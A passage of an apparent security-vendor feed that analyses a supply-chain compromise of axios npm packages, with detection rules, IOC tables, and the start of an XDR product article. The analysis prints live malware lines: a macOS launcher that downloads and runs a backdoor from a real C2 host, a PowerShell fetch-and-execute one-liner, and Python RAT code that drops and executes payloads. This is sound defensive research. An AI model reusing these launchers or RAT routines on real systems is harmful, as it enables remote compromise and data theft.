  → OS-native execution (sh / cscript / osascript)
    → remote payload retrieval
      → backgrounded or hidden execution of stage 2
</code></pre>
<p>This results in a small but high-signal window where:</p>
<ul>
<li><code>node</code> spawns a shell or interpreter</li>
<li>a remote payload is fetched</li>
<li>execution is detached from the original process</li>
</ul>
<p>Elastic detections triggered reliably on this behavior across platforms, providing strong coverage of the delivery stage.</p>
<h2>How Elastic Detects the Supply Chain Attack</h2>
<p>This activity consistently appears in process telemetry as a Node.js process spawning an OS-native execution path to retrieve and execute a remote payload, often in a detached or hidden context. Elastic detections focus on this behavior rather than static indicators, providing reliable coverage of the delivery stage across platforms.</p>
<h3>Linux</h3>
<p>The Linux execution path is the cleanest place to start, because the malware does very little to hide what it is doing. We observed that the delivery stage produced exactly the kind of process ancestry you would expect from a compromised dependency:</p>
<pre><code>node → /bin/sh -c curl -o /tmp/ld.py ... &amp;&amp; nohup python3 /tmp/ld.py ... &amp;
</code></pre>
<p>Which shows up as follows:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image6.png" alt="Elastic alerts triggering on backdoor execution" /></p>
<p>The initial signal comes from the Node.js process, handing off execution to a shell that performs a remote fetch. This is captured by the <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via</a> <a href="http://Node.js">Node.js</a> detection rule.</p>
<pre><code>event.category:process and
process.parent.name:(&quot;node&quot; or &quot;bun&quot; or &quot;node.exe&quot; or &quot;bun.exe&quot;) and 
(
  (
    process.name:(
      &quot;bash&quot; or &quot;dash&quot; or &quot;sh&quot; or &quot;tcsh&quot; or &quot;csh&quot; or  &quot;zsh&quot; or &quot;ksh&quot; or
      &quot;fish&quot; or &quot;cmd.exe&quot; or &quot;bash.exe&quot; or &quot;powershell.exe&quot;
    ) and
    process.command_line:(*curl*http* or *wget*http*)
  ) or 
  process.name:(&quot;curl&quot; or &quot;wget&quot; or &quot;curl.exe&quot; or &quot;wget.exe&quot;)
)
</code></pre>
<p>This captures the moment when the installation flow deviates from normal package behavior and begins pulling a payload over HTTP. In this case, it is the <code>curl</code> invocation that retrieves <code>/tmp/ld.py</code> from the remote server.</p>
<p>Shortly after, execution continues in the same shell, but now the focus shifts from retrieval to execution. This is picked up by <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a>.</p>
<pre><code>event.category:process and event.type:start and
process.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and
process.args:(-c and *&amp;)
</code></pre>
<p>Which captures the second half of the chain:</p>
<pre><code>sh -c &quot;... &amp;&amp; nohup python3 /tmp/ld.py ... &amp;&quot;
</code></pre>
<p>The payload is launched with <code>nohup</code> and backgrounded immediately using <code>&amp;</code>, detaching it from the parent process and suppressing output. That transition from a short-lived install-time shell into a detached long-running process is where the actual implant takes over.</p>
<p>After execution, the Linux second stage is a Python-based RAT that establishes a simple polling loop to its C2. The entrypoint <code>work()</code> sends an initial <code>FirstInfo</code> message and then transitions into <code>main_work()</code>, which continuously reports host data and processes tasking:</p>
<pre><code class="language-py">while True:
    ps = print_process_list()

    data = {
        &quot;hostname&quot;: get_host_name(),
        &quot;username&quot;: get_user_name(),
        &quot;os&quot;: os,
        &quot;processList&quot;: ps
    }

    response_content = send_result(url, body)

    if response_content:
        process_request(url, uid, response_content)

    time.sleep(60)
</code></pre>
<p>On first check-in, it performs a targeted directory enumeration via <code>init_dir_info()</code> across user paths such as <code>$HOME</code>, <code>.config</code>, <code>Documents</code>, and <code>Desktop</code>, and builds a process listing directly from <code>/proc</code>, including usernames and start times.</p>
<p>Tasking is minimal but flexible. <code>runscript</code> supports arbitrary shell execution or base64-delivered Python via <code>python3 -c</code>, while <code>peinject</code> simply writes attacker-supplied bytes to a hidden file in <code>/tmp</code> and executes it:</p>
<pre><code class="language-py">file_path = f&quot;/tmp/.{generate_random_string(6)}&quot;
with open(file_path, &quot;wb&quot;) as file:
    file.write(payload)

os.chmod(file_path, 0o777)
subprocess.Popen([file_path] + shlex.split(param.decode(&quot;utf-8&quot;)))
</code></pre>
<p>This provides the operator with a lightweight access implant for periodic host profiling, command execution, and follow-on payload delivery.</p>
<p>Together, these detections provide strong coverage of the Linux delivery stage and the transition into the Python backdoor, without relying on specific filenames or hardcoded indicators:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via</a> <a href="http://Node.js">Node.js</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a></li>
</ul>
<h3>Windows</h3>
<p>The Windows execution path follows the same pattern: it uses curl to download a remote PowerShell script and proxy execution via a renamed PowerShell (<code>C:\ProgramData\wt.exe</code>). The following alert shows the process chain:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image5.png" alt="Elastic - Alert Process Tree" title="Elastic - Alert Process Tree" /></p>
<p>Where:</p>
<ul>
<li><code>wt.exe</code> is a renamed copy of <code>PowerShell.exe</code> located in <code>C:\ProgramData\wt.exe</code></li>
<li><code>curl</code> is used to retrieve a remote PowerShell script</li>
<li>execution is performed via the renamed binary</li>
</ul>
<p>We first observe the creation and use of the renamed interpreter. This is captured by <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a>, which flags signed system binaries executed from unexpected locations.</p>
<p>Shortly after, the same binary is used to retrieve the second-stage payload over HTTP. This is picked up by <a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a>, capturing the network retrieval stage driven from the scripted execution chain.</p>
<p>The second stage is a PowerShell-based RAT that beacons to its C2 (<code>http[:]//sfrclak[.]com:8000/</code>) every 60 seconds over HTTP using a fake IE8 User-Agent and base64-encoded JSON.</p>
<p>It establishes persistence via <code>Run\MicrosoftUpdate</code> registry key to execute a hidden bat script <code>C:\ProgramData\system.bat:</code></p>
<p>The batch file dynamically retrieves and executes the payload in memory on login:</p>
<pre><code>
start /min powershell -w h -c &quot;
([scriptblock]::Create(
  [System.Text.Encoding]::UTF8.GetString(
    (Invoke-WebRequest -UseBasicParsing -Uri '' -Method POST -Body 'packages.npm.org/product1').Content
  )
)) ''&quot;
</code></pre>
<p>Its core capabilities include:</p>
<ul>
<li><strong>peinject</strong> - in-memory .NET assembly injection using Assembly.Load(byte[]) for process hollowing into cmd.exe.</li>
<li><strong>runscript</strong> - arbitrary PowerShell script execution via encoded commands or temp files,</li>
<li><strong>rundir</strong> - filesystem enumeration of user directories and all drive roots.</li>
</ul>
<p>On initialization, it fingerprints the host via WMI, collecting hostname, username, OS version, CPU, hardware model, timezone, boot/install times, and a full process listing, and sends an initial directory listing of Documents, Desktop, OneDrive, and AppData before entering its beacon loop.</p>
<p>The second stage triggers both the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a> and <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a> alerts:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image2.png" alt="" /></p>
<p>The <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a> rule alert captures the PowerShell RAT script content :</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image1.png" alt="" /></p>
<p>Taken together, these detections capture the full Windows delivery chain: from renamed binary execution, to payload retrieval, to persistence, and in-memory execution via the following behavioral detections:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a></li>
</ul>
<h3>macOS</h3>
<p>Analysis shows the loader writes AppleScript to a temp file, runs it via <code>osascript</code>, then downloads the second stage to a fake Apple-looking cache path and launches it through <code>/bin/zsh</code>. The key launcher looks like this:</p>
<pre><code>do shell script &quot;curl -o /Library/Caches/com.apple.act.mond \
 -d packages.npm.org/product0 \
 -s http://sfrclak.com:8000/6202033 \
 &amp;&amp; chmod 770 /Library/Caches/com.apple.act.mond \
 &amp;&amp; /bin/zsh -c \&quot;/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &amp;\&quot; \ &amp;&gt; /dev/null&quot;
</code></pre>
<p>The delivered file produced the following execution matching on the file name masquerading attempt and the self-signed code signature :</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image3.png" alt="Elastic Defend behavior alert triggering on the macOS backdoor" title="Elastic Defend behavior alert triggering on the macOS backdoor" /></p>
<p>The payload path itself triggers the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a> and <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a> endpoint rules, as it mimics Apple naming conventions (<code>com.apple.*</code>) but does not match expected signing characteristics.</p>
<p><code>com.apple.act.mond</code> is a custom-built macOS backdoor compiled as a universal Mach-O binary (x86_64 and ARM64) using C++ and Xcode, with HTTP-based C2 communications via <code>libcurl</code> and a JSON command protocol.</p>
<p>On initial check-in, it fingerprints the host, collecting hostname, username, OS version, hardware model, timezone, and a full process listing (<code>ps -eo user,pid,command</code>), which surfaces via the <a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a> endpoint rule, capturing unexpected child process activity originating from the backdoor:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/image4.png" alt="Elastic Defend macOS alert triggering on the process enumeration from the macOS backdoor" title="Elastic Defend macOS alert triggering on the process enumeration from the macOS backdoor" /></p>
<p>The macOS backdoor facilitates:</p>
<ul>
<li>C2 connection by passing a URL directly as an argument.</li>
<li>AppleScript execution using <code>osascript</code> via temporary hidden <code>.scpt</code> files dropped to <code>/tmp/</code></li>
<li>Filesystem enumeration targeting <code>/Applications</code> and <code>~/Library/Application Support</code></li>
<li>Downloading and executing remote base64-encoded payloads.</li>
<li>Ad-hoc code signing of dropped payloads (<code>codesign --force --deep --sign - “/private/tmp/.*”</code>)  so it can run past Gatekeeper.</li>
</ul>
<p>The binary is not packed or obfuscated, ships with debug entitlements enabled, and retains developer build paths (<code>Jain_DEV/client_mac/macWebT</code>) and uses a spoofed IE8/Windows XP user-agent string (mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)).</p>
<p>These detections collectively follow the macOS delivery path from staged AppleScript execution to payload launch and post-execution behavior:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a></li>
</ul>
<h2>Conclusion</h2>
<p>This supply chain attack highlights how little complexity is required to achieve cross-platform compromise when execution is triggered during installation.</p>
<p>Across Linux, Windows, and macOS, we consistently observed the same core pattern: a Node.js process spawning native OS execution to retrieve and launch a remote payload, followed by immediate detachment or hidden execution.</p>
<p>From a detection perspective, the key takeaway is that the most reliable signals are not in the package itself, but in what happens immediately after installation. Process ancestry, network retrieval, and detached execution provide a stable detection surface that remains effective even when payloads, filenames, or infrastructure change.</p>
<p>Elastic detections focused on this behavior provided consistent coverage of the delivery stage across all platforms, without relying on static indicators.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Related Alerts</h3>
<table>
<thead>
<tr>
<th align="left">Alert</th>
<th align="left">Operating System</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml">Curl or Wget Spawned via</a> <a href="http://Node.js">Node.js</a></td>
<td align="left">Linux</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/linux/execution_process_backgrounded_by_unusual_parent.toml">Process Backgrounded by Unusual Parent</a></td>
<td align="left">Linux</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/defense_evasion_execution_via_renamed_signed_binary_proxy.toml">Execution via Renamed Signed Binary Proxy</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/detection-rules/blob/c932ececd9c3b1257fc0350ec2dc13a1af0d6f88/rules/windows/command_and_control_tool_transfer_via_curl.toml">Potential File Transfer via Curl for Windows</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_startup_persistence_via_windows_script_interpreter.toml">Startup Persistence via Windows Script Interpreter</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/persistence_suspicious_string_value_written_to_registry_run_key.toml">Suspicious String Value Written to Registry Run Key</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/windows/execution_suspicious_powershell_base64_decoding.toml">Suspicious PowerShell Base64 Decoding</a></td>
<td align="left">Windows</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/command_and_control_suspicious_url_as_argument_to_self_signed_binary.toml">Suspicious URL as argument to Self-Signed Binary</a></td>
<td align="left">macOS</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/defense_evasion_potential_binary_masquerading_via_invalid_code_signature.toml#L8">Potential Binary Masquerading via Invalid Code Signature</a></td>
<td align="left">macOS</td>
</tr>
<tr>
<td align="left"><a href="https://github.com/elastic/protections-artifacts/blob/278054cb0e90dca20d6fe06f63cce6600902d50d/behavior/rules/macos/execution_suspicious_xpc_service_child_process.toml#L5">Suspicious XPC Service Child Process</a></td>
<td align="left">macOS</td>
</tr>
</tbody>
</table>
<h3>Malicious Packages</h3>
<table>
<thead>
<tr>
<th>Package</th>
<th>Version</th>
<th>Hash (shasum)</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>axios</code></td>
<td><code>1.14.1</code></td>
<td><code>2553649f232204966871cea80a5d0d6adc700ca</code></td>
</tr>
<tr>
<td><code>axios</code></td>
<td><code>0.30.4</code></td>
<td><code>d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71</code></td>
</tr>
<tr>
<td><code>plain-crypto-js</code></td>
<td><code>4.2.1</code></td>
<td><code>07d889e2dadce6f3910dcbc253317d28ca61c766</code></td>
</tr>
</tbody>
</table>
<p>Additional related packages observed in the ecosystem abuse:</p>
<table>
<thead>
<tr>
<th>Package</th>
<th>Version</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>@shadanai/openclaw</code></td>
<td><code>2026.3.28-2</code>, <code>2026.3.28-3</code>, <code>2026.3.31-1</code>, <code>2026.3.31-2</code></td>
</tr>
<tr>
<td><code>@qqbrowser/openclaw-qbot</code></td>
<td><code>0.0.130</code></td>
</tr>
</tbody>
</table>
<h3>Script / Payload Hashes (SHA256)</h3>
<table>
<thead>
<tr>
<th>File</th>
<th>SHA256</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>setup.js</code></td>
<td><code>e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09</code></td>
</tr>
<tr>
<td><code>/tmp/ld.py</code></td>
<td><code>6483c004e207137385f480909d6edecf1b699087378aa91745ecba7c3394f9d7</code></td>
</tr>
<tr>
<td><code>6202033.ps1</code></td>
<td><code>ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c</code></td>
</tr>
<tr>
<td><code>system.bat</code></td>
<td><code>e49c2732fb9861548208a78e72996b9c3c470b6b562576924bcc3a9fb75bf9ff</code></td>
</tr>
<tr>
<td><code>com.apple.act.mond</code></td>
<td><code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</code></td>
</tr>
</tbody>
</table>
<h3>Network Indicators</h3>
<table>
<thead>
<tr>
<th>Type</th>
<th>Indicator</th>
</tr>
</thead>
<tbody>
<tr>
<td>C2 Domain</td>
<td><code>sfrclak[.]com</code></td>
</tr>
<tr>
<td>C2 IP</td>
<td><code>142.11.206[.]73</code></td>
</tr>
<tr>
<td>C2 URL</td>
<td><code>http://sfrclak[.]com:8000/6202033</code></td>
</tr>
<tr>
<td>User-Agent</td>
<td><code>mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)</code></td>
</tr>
<tr>
<td>macOS POST body</td>
<td><code>packages[.]npm[.]org/product0</code></td>
</tr>
<tr>
<td>Windows POST body</td>
<td><code>packages[.]npm[.]org/product1</code></td>
</tr>
<tr>
<td>Linux POST body</td>
<td><code>packages[.]npm[.]org/product2</code></td>
</tr>
</tbody>
</table>
<h3>File System Indicators</h3>
<h4>Cross-platform</h4>
<table>
<thead>
<tr>
<th>Path / Artifact</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>$TMPDIR/6202033</code></td>
<td>Temporary staging artifact</td>
</tr>
<tr>
<td><code>*/node_modules/plain-crypto-js/setup.js</code></td>
<td>Node.js first-stage dropper</td>
</tr>
</tbody>
</table>
<h4>Linux</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/tmp/ld.py</code></td>
<td>Python RAT second stage</td>
</tr>
</tbody>
</table>
<h4>Windows</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>%PROGRAMDATA%\wt.exe</code></td>
<td>Renamed <code>powershell.exe</code> (execution proxy)</td>
</tr>
<tr>
<td><code>%PROGRAMDATA%\system.bat</code></td>
<td>Persistence launcher</td>
</tr>
<tr>
<td><code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate</code></td>
<td>Persistence key</td>
</tr>
<tr>
<td><code>%TEMP%\6202033.vbs</code></td>
<td>VBS launcher (self-deletes)</td>
</tr>
<tr>
<td><code>%TEMP%\6202033.ps1</code></td>
<td>PowerShell payload (self-deletes)</td>
</tr>
</tbody>
</table>
<h4>macOS</h4>
<table>
<thead>
<tr>
<th>Path</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/Library/Caches/com.apple.act.mond</code></td>
<td>Mach-O backdoor payload</td>
</tr>
<tr>
<td><code>/tmp/*.scpt</code></td>
<td>Temporary AppleScript launcher</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/axios-supply-chain-compromise-detections/axios-supply-chain-compromise-detections.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Investigating from the Endpoint Across Your Environment with Elastic Security XDR]]></title>
            <link>https://www.elastic.co/security-labs/investigating-from-the-endpoint-across-your-environment</link>
            <guid>investigating-from-the-endpoint-across-your-environment</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article highlights how Elastic Security XDR unifies endpoint protection with multi-domain security analytics to help analysts trace and contain multi-stage attacks across hybrid and cloud environments.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Security investigations rarely stay confined to a single host. Today’s attackers increasingly use automation and AI to compress multi-stage attacks into minutes, turning what once unfolded over days into coordinated activity across endpoints, identities, workloads, and cloud services within minutes.</p>
<p>While many attacks begin on an endpoint, investigators must quickly determine how that activity spreads across the environment. In many environments, per-endpoint licensing limits how broadly protection and telemetry can be deployed, creating protection gaps during these investigations.</p>
<p>Elastic Security XDR is built around that reality. It includes best-in-class endpoint protection, without per-endpoint licensing constraints, in an agentic security operations platform where endpoint telemetry, infrastructure signals, and supporting artifacts can be analyzed together.</p>
<p>This post explores how Elastic Security XDR supports investigations across endpoints, workloads, and the broader environment, highlighting tools and workflows that help analysts collect evidence, pivot across telemetry, and respond efficiently.</p>
<h2>Endpoint at the heart of XDR</h2>
<p>The <a href="https://www.elastic.co/resources/security/report/global-threat-report">2025 Elastic Global Threat Report</a> reveals that with 90% of malware targeting Windows, and browsers acting as the 'primary battleground', host-level visibility is essential to stopping a breach before it scales to the cloud. Elastic Defend, Elastic Security’s native endpoint protection, powers XDR from the endpoint outward. It not only prevents threats across Windows, macOS, and Linux, but also generates rich, investigation-grade telemetry that gives analysts the context they need to understand what happened on a host.</p>
<p>As activity occurs, Elastic Defend captures system events including process execution, file changes, network connections, and related artifacts. This telemetry forms the foundation for broader investigations, allowing analysts to correlate endpoint behavior with activity across workloads, identities, and other systems.</p>
<p>Multiple detection layers protect against malware, ransomware, fileless techniques, and other malicious behaviors, using both static and behavioral analysis. Independent validation from the <a href="https://www.elastic.co/blog/av-comparatives-business-security-test-2025">AV-Comparatives Business Security Test</a> confirms Elastic’s effectiveness; in the 2025 test cycle, Elastic Security was the only vendor that blocked every tested threat, earning perfect scores in both Real-World Protection and Malware Protection.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image2.png" alt="" /></p>
<p>Elastic also takes a principled approach to openness. Unlike many endpoint security tools that operate as a black box, Elastic publishes detection and prevention logic in an <a href="https://github.com/elastic/protections-artifacts">open repository</a>. This transparency lets analysts understand how protections work, validate them in their own environments, and prioritize high-risk gaps. By empowering users with visibility and insight, Elastic ensures security teams can act with confidence and maximize the value of their investigations.</p>
<h2>Beyond the endpoint: expanding the investigation</h2>
<p>Attacks rarely stay confined to a single host. Credentials may be compromised, workloads modified, or activity spread across cloud services and infrastructure. To fully understand an incident, analysts need to correlate endpoint activity with signals from the broader environment.</p>
<p>Elastic Security XDR enables this by bringing multiple data sources into the same analysis environment through <a href="https://www.elastic.co/integrations/data-integrations?solution=all-solutions&amp;category=security">hundreds of integrations</a> with popular security tools and data sources. Endpoint telemetry,whether collected by Elastic Defend or another EDR platform, can be analyzed alongside cloud activity, identity events, network telemetry, and third-party logs, without forcing organizations into a closed security stack. Elastic provides the <a href="https://www.elastic.co/docs/reference/ecs">common schema</a> and unified detection engine required to normalize disparate signals, allowing analysts to bypass manual data mapping and immediately pivot between sources to follow how activity moves across users, systems, and infrastructure.</p>
<p>Centralized <a href="https://elastic.github.io/detection-rules-explorer/">detection rules</a> operate across the unified dataset in the security platform, complementing <a href="https://github.com/elastic/protections-artifacts">real-time protections</a> that run directly on the endpoint. They enable alerts to reflect correlated activity across multiple domains. Suspicious process activity on a host can be matched with identity events, cloud API calls, or network behavior, helping analysts determine whether an event is isolated or part of a larger attack chain.</p>
<p>Container workloads highlight another way XDR extends investigations. <a href="https://www.elastic.co/security-labs/getting-started-with-defend-for-containers">Elastic Defend for Containers</a> monitors runtime behavior inside containerized environments, detecting suspicious activity such as unexpected process execution, privilege escalation, or access to sensitive resources. By connecting endpoint behavior to the broader environment, Elastic Security XDR gives analysts the visibility needed to scope incidents accurately, prioritize critical threats, and respond with confidence.</p>
<h2>Reconstructing the attack path</h2>
<p>After relevant telemetry is collected, analysts need to piece together what happened and how the attack progressed. Investigations involve pivoting between events, validating hypotheses, and assembling a complete timeline of activity across the environment.</p>
<p>Elastic Security XDR provides <a href="https://www.elastic.co/docs/solutions/security/investigate">investigation tools</a> designed to support this process. Visual Event Analyzer, Session View, and Timeline allow analysts to explore relationships between events, trace execution chains, and correlate activity across datasets while maintaining investigative context.</p>
<p>Visual Event Analyzer offers a graphical view of process relationships, helping analysts spot suspicious parent-child behavior and understand execution flows. Session View reconstructs activity within a process session, showing commands, network connections, and other actions as they unfolded. Timeline acts as an investigative workspace where analysts collect and correlate events from multiple sources, refine queries, and build a coherent attack narrative.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image5.png" alt="Investigate alerts &amp; processes with Event Analyzer" title="Investigate alerts &amp; processes with Event Analyzer" /></p>
<p>Together, these tools help analysts validate hypotheses faster, deepen analysis, and enable more confident response decisions.</p>
<h2>Agentic investigation: discovery, summarization, and natural language querying</h2>
<p>Elastic Security’s AI-driven investigative workflows help analysts keep pace with modern attacks by accelerating investigation and surfacing connected activity across the environment. Attack Discovery identifies connected alerts across endpoints, workloads, cloud services, and integrated third-party data, helping analysts uncover hidden attack chains without manually correlating events.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image6.png" alt="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." title="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." /></p>
<p>Once an investigation is underway, Elastic AI Assistant and Agent Builder enable natural-language workflows that let analysts interact with data and automation more efficiently. Analysts can summarize observations, ask questions about entities and activity, and move seamlessly from supporting signals to containment or remediation actions. With the introduction of <a href="https://www.elastic.co/security-labs/agent-skills-elastic-security">agent skills</a>, teams can now extend these workflows with reusable, task-specific capabilities, such as alert triage, rule management, and case handling, allowing the assistant to execute complex, multi-step security tasks with the same consistency and repeatability as traditional automation, but through a conversational interface.</p>
<p>In practice, these capabilities reduce the time from an initial alert to full incident understanding, allowing SOC teams to respond faster, focus on high-priority threats, and act with confidence.</p>
<h2>Built-in forensics and host artifact collection</h2>
<p>During incident response, investigators often need to retrieve additional host artifacts to confirm attacker behavior, identify persistence, or validate user activity.</p>
<p>Elastic Security XDR includes built-in forensic capabilities that allow responders to collect investigative artifacts directly from affected hosts, reducing the need for separate forensic tooling during common investigative tasks. Elastic Defend supports capturing <a href="https://www.elastic.co/docs/solutions/security/endpoint-response-actions#memory-dump">memory snapshots</a> for deeper forensic analysis, while <a href="https://www.elastic.co/docs/solutions/security/investigate/osquery">Osquery Manager</a> enables analysts to run targeted queries to gather and examine host artifacts as part of an investigation.</p>
<p>Forensic visibility is further extended through ongoing collaboration with Osquery. By extending Osquery-based forensics with supplemental tables for common investigative artifacts, Elastic helps uncover evidence such as browser history, AMCache records, and jumplist artifacts. These sources make it easier for analysts to examine user activity and execution history on Windows systems during an investigation. Also available is library of prebuilt forensic queries and packs to extract common investigative artifacts across Windows, macOS, and Linux, including:</p>
<ul>
<li>process listings and execution context</li>
<li>scheduled tasks, startup items, and persistence mechanisms</li>
<li>shell history and command execution artifacts</li>
<li>network configuration and connectivity context</li>
<li>file hashes and other execution-related artifacts</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image3.png" alt="Osquery forensic packs within Elastic Security" title="Osquery forensic packs within Elastic Security" /></p>
